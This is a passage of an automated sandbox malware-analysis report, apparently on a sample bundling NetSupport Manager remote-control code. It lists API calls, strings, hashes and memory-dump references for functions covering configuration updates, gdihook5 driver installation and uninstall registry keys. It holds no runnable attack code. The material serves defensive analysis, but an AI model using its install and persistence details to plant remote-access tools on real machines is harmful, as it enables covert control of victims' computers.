                                                                                          • SelectObject.GDI32(00000000,?), ref: 005C2508
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C2511
                                                                                          • DeleteDC.GDI32(00000000), ref: 005C2514
                                                                                          • DeleteObject.GDI32(00000000), ref: 005C2520
                                                                                          • DeleteObject.GDI32(?), ref: 005C2526
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Color$DeleteSelect$Create$CompatibleText$Bitmap
                                                                                          • String ID:
                                                                                          • API String ID: 294456051-0
                                                                                          • Opcode ID: 674495c8547bdb80b2d219cb03abdbbb4ea1bf2cf5c9dda48cc449f910337ad2
                                                                                          • Instruction ID: 796522866773b65c187dfc270804c574851fc6037c57b688c67d202611f119de
                                                                                          • Opcode Fuzzy Hash: 674495c8547bdb80b2d219cb03abdbbb4ea1bf2cf5c9dda48cc449f910337ad2
                                                                                          • Instruction Fuzzy Hash: 87314571A40218BBDB10DBA5DC8AFEFB7BDEF8D710F148045FA00A7290D6B4A9418B75
                                                                                          Function 00596280 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 342COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005962E0
                                                                                          • wsprintfW.USER32 ref: 005962F4
                                                                                          • wsprintfW.USER32 ref: 00596351
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,80000002,?,00020019), ref: 005963D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$EnvironmentExpandStrings
                                                                                          • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                          • API String ID: 2608976442-3241390832
                                                                                          • Opcode ID: 31b0f64f14ce508a16fa656e2c4fe9c0357c3f1af11f99b1210c082aec18009e
                                                                                          • Instruction ID: e7b0026cec427616bd2469a17ea5e031f4925faa353604991209e5e385f69085
                                                                                          • Opcode Fuzzy Hash: 31b0f64f14ce508a16fa656e2c4fe9c0357c3f1af11f99b1210c082aec18009e
                                                                                          • Instruction Fuzzy Hash: CED173719003199ADF24DBA4DC96BEDBB74BF55304F0444D9E909A3182EB746B88CFA2
                                                                                          Function 005BE8E0 Relevance: 30.0, APIs: 3, Strings: 14, Instructions: 291COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005BEA34
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005BE941
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$CurrentDirectoryLocalTimewvsprintf
                                                                                          • String ID: %s\%s$Update [%s]%s=%s, format=%d$can't open client32.upd$client32.ini$client32.ini %s$client32.upd$client32u.ini$client32u.ini %s$doesn't exist$error %d opening %s - update failed$exists$update error$update error - wrong file format?$updating from client32.upd, cwd=%s
                                                                                          • API String ID: 3750057539-2256608672
                                                                                          • Opcode ID: 06065fdb7a59f507681dae187712763e5b3574e3848186a1fbf3472e8bb76b24
                                                                                          • Instruction ID: 1d0261517649a48be5647655eaeea8b0bb62a3861324acb340c0c1ec397e2233
                                                                                          • Opcode Fuzzy Hash: 06065fdb7a59f507681dae187712763e5b3574e3848186a1fbf3472e8bb76b24
                                                                                          • Instruction Fuzzy Hash: 1BA12A719006159ADF20EB648C5BBEA7EB5FF84745F0C44A5F80B972C2EA706E84C791
                                                                                          Function 005AC800 Relevance: 30.0, APIs: 10, Strings: 7, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,00000000,:Y,?,?,00000000), ref: 005AC858
                                                                                          • GetLastError.KERNEL32 ref: 005AC86B
                                                                                          • GetLastError.KERNEL32(00000000), ref: 005AC86E
                                                                                          • wsprintfW.USER32 ref: 005AC884
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileMappingOpenwsprintf
                                                                                          • String ID: can't open filemap(%s), gle=%d (x%x)$cant map$openevent error$ver dead$ver unknown$zero pid$:Y
                                                                                          • API String ID: 3808650745-1124260954
                                                                                          • Opcode ID: e9706f9f335e6780ed53dffb764d5f60de949b878d0de0db4cb386afe1189384
                                                                                          • Instruction ID: 9aadbb4c9c92959fb02c44e10159952b34bb4809a0d9e05dffc2dd0a09582213
                                                                                          • Opcode Fuzzy Hash: e9706f9f335e6780ed53dffb764d5f60de949b878d0de0db4cb386afe1189384
                                                                                          • Instruction Fuzzy Hash: 1961EA71B406099ED724DF64DC15FBE7BE5FB88710F04415AFA06962C1EEB0AA40CB94
                                                                                          Function 005AF017 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 163fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF145
                                                                                          • GetTempFileNameW.KERNEL32(?,0061D714,00000000,?), ref: 005AF158
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005AF16E
                                                                                          • MoveFileExW.KERNEL32(?,?,00000005), ref: 005AF1A3
                                                                                          Strings
                                                                                          • gdihook5 (e2=%d), xrefs: 005AF430
                                                                                          • using .inf=%s, xrefs: 005AF060
                                                                                          • InstallGdihook5 ret %d, xrefs: 005AF496
                                                                                          • copy %s to %s ok, xrefs: 005AF186
                                                                                          • gdihook5.dll, xrefs: 005AF0B8
                                                                                          • gdihook5.inf, xrefs: 005AF052
                                                                                          • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 005AF472
                                                                                          • Unloadable mirror detected - update on reboot, xrefs: 005AF12C
                                                                                          • mirror already installed, xrefs: 005AF105
                                                                                          • \gdihook5.dll, xrefs: 005AF0F1
                                                                                          • rename %s to %s on reboot ok, xrefs: 005AF1BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$DirectorySystem$CopyMoveNameTemp
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$gdihook5.inf$mirror already installed$rename %s to %s on reboot ok$using .inf=%s
                                                                                          • API String ID: 3049351088-2506460843
                                                                                          • Opcode ID: 980e931e3386f101056ec6ccdb77a261c7f88fac4f96ed172dbf50e8bd271346
                                                                                          • Instruction ID: 954cadcdfe82f9e4556a172546330fdb8c65620e4b856df13aed81ad8231d0c2
                                                                                          • Opcode Fuzzy Hash: 980e931e3386f101056ec6ccdb77a261c7f88fac4f96ed172dbf50e8bd271346
                                                                                          • Instruction Fuzzy Hash: 43512B7690021A97CB30AB94CC56BFF7765FF45304F0886B6E91A571C2EA705E44CFA1
                                                                                          Function 005B8C70 Relevance: 28.8, APIs: 19, Instructions: 301COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005B6BB0: GetDC.USER32(00000000), ref: 005B6BB7
                                                                                            • Part of subcall function 005B60C0: GetObjectW.GDI32(?,00000018,?), ref: 005B60DE
                                                                                            • Part of subcall function 005B60C0: GetStockObject.GDI32(0000000F), ref: 005B60F2
                                                                                            • Part of subcall function 005B60C0: GetDC.USER32(00000000), ref: 005B6174
                                                                                            • Part of subcall function 005B60C0: SelectPalette.GDI32(00000000,?,00000000), ref: 005B6185
                                                                                            • Part of subcall function 005B60C0: RealizePalette.GDI32(00000000), ref: 005B618B
                                                                                            • Part of subcall function 005B60C0: GlobalAlloc.KERNEL32(00000042,?), ref: 005B61A6
                                                                                            • Part of subcall function 005B60C0: SelectPalette.GDI32(00000000,?,00000001), ref: 005B61BA
                                                                                            • Part of subcall function 005B60C0: RealizePalette.GDI32(00000000), ref: 005B61BD
                                                                                            • Part of subcall function 005B60C0: ReleaseDC.USER32(00000000,00000000), ref: 005B61C5
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B8CC7
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 005B8CF3
                                                                                          • GlobalLock.KERNEL32(?), ref: 005B8D0B
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005B8D11
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8EF0
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8EF7
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F05
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F0C
                                                                                          • DeleteObject.GDI32(?), ref: 005B8F17
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8F2E
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8F37
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F3D
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F43
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B8F63
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005B8F7D
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005B8F80
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 005B8F8E
                                                                                          • GlobalFree.KERNEL32(?), ref: 005B8F91
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B8F9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Global$Object$FreeUnlock$Palette$Delete$LockRealizeSelect$AllocReleaseStock
                                                                                          • String ID:
                                                                                          • API String ID: 4008216839-0
                                                                                          • Opcode ID: 243df5204f03f5e596a024a8f126f0b30b497442fefb93e044544016ff89f348
                                                                                          • Instruction ID: 53a3f0adc0dbc11a4f6c430be80ebd2d303cc73fe5f60ca168ae81100f28b27e
                                                                                          • Opcode Fuzzy Hash: 243df5204f03f5e596a024a8f126f0b30b497442fefb93e044544016ff89f348
                                                                                          • Instruction Fuzzy Hash: 84B16075E0024A9FCB10DFA9C8859FEBFB9FF99310B189159E914A7351DB30E941CBA0
                                                                                          Function 005DAB70 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 166registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Deletewsprintf
                                                                                          • String ID: DisplayName$InstallUninstall$NSM$NetSupport Manager for Windows (32 bit) V14.10$Software\Microsoft\Windows\CurrentVersion\Uninstall\%s$UninstallString$winstall /U /P%s
                                                                                          • API String ID: 1732204791-2914868138
                                                                                          • Opcode ID: 3f34c78ad4e5e4735268be0f52f5eaa899f89f0efd69a881830852af2f4f7dd8
                                                                                          • Instruction ID: 5e1b2365e722795ed8b9d47fe06a4ea603a18f3a16bfa7d20019bf78e8300d70
                                                                                          • Opcode Fuzzy Hash: 3f34c78ad4e5e4735268be0f52f5eaa899f89f0efd69a881830852af2f4f7dd8
                                                                                          • Instruction Fuzzy Hash: EC51DC75A002099BDB24DB68DC5AFBB776AFB84310F04419AF90D97391EE719E408BA1
                                                                                          Function 005CCE20 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 158windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 005CCE84
                                                                                          • CreateFontIndirectW.GDI32(?), ref: 005CCEA5
                                                                                          • GetDC.USER32(00000000), ref: 005CCF5A
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CCF64
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005CCF6E
                                                                                          • GetTextExtentPoint32W.GDI32(00000000,00621584,00000001,?), ref: 005CCF89
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CCF97
                                                                                          • DeleteObject.GDI32(00000000), ref: 005CCF9E
                                                                                          • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 005CCFD0
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CCFDC
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005CCFE5
                                                                                          • GetMenuInfo.USER32(?,?), ref: 005CD074
                                                                                          • SetMenuInfo.USER32(?,0000001C), ref: 005CD090
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInfoObject$DeleteMenuSelect$CompatibleExtentFontIndirectParametersPoint32ReleaseSectionSystemText
                                                                                          • String ID: ($IncreaseMenuItemHeight
                                                                                          • API String ID: 100183680-1213050523
                                                                                          • Opcode ID: aa1f48126b2423bc4a0ba38718dce3b9b91144f6c094b0fcad4a8083e752050c
                                                                                          • Instruction ID: 5bc73f7438d4f7077010799e5c199e5e0a58e959ead60a09f7c93807ab77e7bf
                                                                                          • Opcode Fuzzy Hash: aa1f48126b2423bc4a0ba38718dce3b9b91144f6c094b0fcad4a8083e752050c
                                                                                          • Instruction Fuzzy Hash: 8B611DB0D012289FDB60CF68DC59BD9BBF5EB48314F0481EAE60CE7240E7715A858FA5
                                                                                          Function 005AF073 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 141fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF0CD
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005AF145
                                                                                          • GetTempFileNameW.KERNEL32(?,0061D714,00000000,?), ref: 005AF158
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005AF16E
                                                                                          • MoveFileExW.KERNEL32(?,?,00000005), ref: 005AF1A3
                                                                                          • wsprintfW.USER32 ref: 005AF436
                                                                                          Strings
                                                                                          • gdihook5 (e2=%d), xrefs: 005AF430
                                                                                          • InstallGdihook5 ret %d, xrefs: 005AF496
                                                                                          • copy %s to %s ok, xrefs: 005AF186
                                                                                          • gdihook5.dll, xrefs: 005AF0B8
                                                                                          • Try again after removing the 'Block Unsigned Driver Policy', xrefs: 005AF472
                                                                                          • Unloadable mirror detected - update on reboot, xrefs: 005AF12C
                                                                                          • mirror already installed, xrefs: 005AF105
                                                                                          • \gdihook5.dll, xrefs: 005AF0F1
                                                                                          • rename %s to %s on reboot ok, xrefs: 005AF1BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$DirectorySystem$CopyMoveNameTempwsprintf
                                                                                          • String ID: Try again after removing the 'Block Unsigned Driver Policy'$InstallGdihook5 ret %d$Unloadable mirror detected - update on reboot$\gdihook5.dll$copy %s to %s ok$gdihook5 (e2=%d)$gdihook5.dll$mirror already installed$rename %s to %s on reboot ok
                                                                                          • API String ID: 3885431741-2696932523
                                                                                          • Opcode ID: ebd3c99fdcb68ac396b27539837f6b436329602f9fab22fb4c49ead4fc0d1dbd
                                                                                          • Instruction ID: f23d973c258572db8ccbff4f7e493df6de78734c1993f4926d6a4974a2f26473
                                                                                          • Opcode Fuzzy Hash: ebd3c99fdcb68ac396b27539837f6b436329602f9fab22fb4c49ead4fc0d1dbd
                                                                                          • Instruction Fuzzy Hash: 1B41067690021A97DB20ABA4CC56BFF7769FF44304F0886B6E91A571C2EA705E44CFA1
                                                                                          Function 005CC2A0 Relevance: 25.7, APIs: 17, Instructions: 153windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(?), ref: 005CC2AD
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CC2BF
                                                                                            • Part of subcall function 005C9840: LoadLibraryW.KERNEL32(gdi32.dll), ref: 005C9855
                                                                                            • Part of subcall function 005C9840: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 005C9867
                                                                                            • Part of subcall function 005C9840: FreeLibrary.KERNEL32(00000000), ref: 005C987E
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 005CC2CF
                                                                                            • Part of subcall function 005C9710: GetVersionExW.KERNEL32(?), ref: 005C976E
                                                                                            • Part of subcall function 005C9710: LoadLibraryW.KERNEL32(kernel32.dll), ref: 005C9795
                                                                                            • Part of subcall function 005C9710: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 005C97A7
                                                                                            • Part of subcall function 005C9710: FreeLibrary.KERNEL32(00000000), ref: 005C97BF
                                                                                            • Part of subcall function 005C9710: GetSystemDefaultLangID.KERNEL32 ref: 005C97CA
                                                                                          • LoadBitmapW.USER32(00000000,?), ref: 005CC2F9
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 005CC309
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC323
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 005CC33B
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 005CC346
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00CC0020), ref: 005CC384
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC395
                                                                                          • SelectObject.GDI32(00000000,?), ref: 005CC39C
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CC3A5
                                                                                          • DeleteDC.GDI32(00000000), ref: 005CC3A8
                                                                                          • ReleaseDC.USER32(?,?), ref: 005CC3B2
                                                                                          • DeleteObject.GDI32(00FF00FF), ref: 005CC3E4
                                                                                          • DeleteObject.GDI32(?), ref: 005CC3EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$DeleteLibrarySelect$CompatibleCreateLoad$AddressBitmapFreeProc$DefaultLangReleaseSystemVersion
                                                                                          • String ID:
                                                                                          • API String ID: 3487081073-0
                                                                                          • Opcode ID: d84693f7d897a4dabf6ab10073ebd31f4ea6a55f7dba78036b9d8a85c394e89f
                                                                                          • Instruction ID: 34f858999d5fc301731e9bbe881c95399b45c0ccef50357183adca6a0c40111e
                                                                                          • Opcode Fuzzy Hash: d84693f7d897a4dabf6ab10073ebd31f4ea6a55f7dba78036b9d8a85c394e89f
                                                                                          • Instruction Fuzzy Hash: 0E415075A00209BFDB00DFA4DC89EEE77BDEF89711F048119F904E7241DA70AA008BB5
                                                                                          Function 005A8180 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 156sleepprocesssynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 005A8267
                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 005A82E0
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005A8309
                                                                                          • Sleep.KERNEL32(000003E8), ref: 005A8314
                                                                                          • CloseHandle.KERNEL32(?), ref: 005A8329
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
